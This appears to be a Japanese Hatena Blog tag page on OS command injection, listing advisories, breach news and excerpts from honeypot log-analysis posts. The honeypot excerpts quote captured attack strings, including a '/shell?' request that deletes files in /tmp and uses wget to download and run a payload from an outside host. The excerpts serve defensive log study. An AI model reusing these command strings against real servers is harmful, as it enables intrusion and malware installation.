Hatena Blog Tags
はてなブログ トップ
OSコマンドインジェクション
このタグでブログを書く
言葉の解説
ネットで話題
関連ブログ

OSコマンドインジェクション

このタグの解説についてこの解説文は、すでに終了したサービス「はてなキーワード」内で有志のユーザーが作成・編集した内容に基づいています。その正確性や網羅性をはてなが保証するものではありません。問題のある記述を発見した場合には、お問い合わせフォームよりご連絡ください。
ハニーレポート2年前

OSコマンドインジェクションを観測する

ハニーポットのアクセスログからOSコマンドインジェクションを調べます。 2月のハニーポットのログからOSコマンドインジェクションを見てみたいと思います。 OSコマンドはいくつかありますが、今回は検索してみて見つけたコマンドインジェクションを調べていきます。 ログファイルからOSコマンドの文字列を検索していきます。 単純にcmdと文字列を入れている部分を抜き取ってみます。 下記のようなコマンドで検索に引っ掛かれば該当文字列がハイライトで表示されます。 grep --color=always 'cmd' access_log.txt 結果: cmd=の後にrm+-rf/tmp/*;wget-- と…

#セキュリティ#ログ分析#OSコマンドインジェクション

ネットで話題

もっと見る
137ブックマークJVN#11448789: 安全なウェブサイト運営入門における OS コマンドインジェクションの脆弱性独立行政法人情報処理推進機構 (IPA) が提供する安全なウェブサイト運営入門には、セーブデータの読み込み処理に起因する OS コマンドインジェクション (CWE-78) の脆弱性が存在します。jvn.jp
106ブックマーク「安全なウェブサイト運営入門」におけるOSコマンド・インジェクションの脆弱性:IPA 独立行政法人 情報処理推進機構「安全なウェブサイト運営入門」にOSコマンド・インジェクションの脆弱性が存在することが判明しました。 この脆弱性を悪用された場合、悪意ある第三者の攻撃により「安全なウェブサイト運営入門」が動作しているコンピュータ上でOSコマンドが実行されてしまう危険性があります。 このことから「安全なウェブサイト運営...www.ipa.go.jp
85ブックマーク「ケータイキット for Movable Type」のOSコマンドインジェクションの修正 | 水無月ばけらのえび日記更新: 2016年4月27日11時5分頃 Movable Typeのプラグイン「ケータイキット for Movable Type」にOSコマンドインジェクションの脆弱性があったという話が出ており、J-WAVEの64万件の個人情報流出はこれが原因だったとされています。 J-WAVEでも64万件の個人情報流出の可能性、原因ソフトの利用者は至急パッチ適用を (itpr...bakera.jp
57ブックマーク日テレで43万件の個人情報流出--攻撃に使われた「OSコマンドインジェクション」とは?japan.cnet.com
43ブックマーク日テレのサイトから個人情報43万件が流出した恐れ、OSコマンドインジェクションによる不正アクセスで internet.watch.impress.co.jp
38ブックマークBlog|OS コマンドインジェクション その危険性と対策yamory.io
33ブックマーク脆弱性を利用した攻撃手法(3) --- ディレクトリ・トラバーサルとOSコマンド・インジェクションxtech.nikkei.com
30ブックマーク脆弱性を攻撃してみよう (1) OSコマンドインジェクション (OGNL式インジェクション) - Qiitaqiita.com
24ブックマークJVN#80144272: TYPE-MOON 製の複数のゲーム製品における OS コマンドインジェクションの脆弱性TYPE-MOON が提供する複数のゲーム製品には、OS コマンドインジェクションの脆弱性が存在します。 Fate/stay night (CD版、DVD版) Fate/hollow ataraxia 魔法使いの夜 Fate/stay night + hollow ataraxia (セット版)jvn.jp

関連ブログ

初心者データサイエンティストの備忘録2年前

OSコマンド・インジェクションとセッション・ハイジャック

OSコマンド・インジェクションとセッション・ハイジャックについて勉強しました。本記事はこれらの攻撃についてまとめています。なお、私はセキュリティに関してはずぶの素人で本記事にも誤りが含まれているかもしれません。その際はコメントでご指摘いただけると幸いです。 OSコマンド・インジェクション どんな攻撃? 脆弱性のあるWEBサイトの入力値に、悪意あるOSコマンドを入力することでWEBサーバに不正な動作を引き起こす攻撃です。 例 ファイル名を変更をする機能を持ったWEBサイトがあるとします。図1のようなイメージです。 図1:ファイル名を変更するWEBサイト このとき、WEBサーバ上の次のようなコマン…

#OSコマンドインジェクション#セッションハイジャック#セキュリティ
ハニーレポート3年前

wgetしてくるやつを抽出するよ!

ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事によりログ分析ができていませんでした。そのため、現時点で3日分のログしか溜まっていません(えっ!? それでも、すでに数千アクセス来ているのでログを見ていこうと思います。 今日は、wgetしてくる攻撃をピンポイントで抽出します。ログファイルを書きコマンドで抽出します。[1] $ grep -i wget access_log 結果 検索件数:10件 [2022-…

#セキュリティ#ハニーポット#ログ分析#OSコマンドインジェクション
ハニーレポート3年前

OSコマンドインジェクションいただきました

下記のログを分析していくよ! 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 19 /favicon.ico 17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.sytes.net/jaws;sh+/tmp/jaws 14 /?XDEBUG_SESSION_START=phpstorm 13 /shell?cd+/t…

#セキュリティ#ハニーポット#OSコマンドインジェクション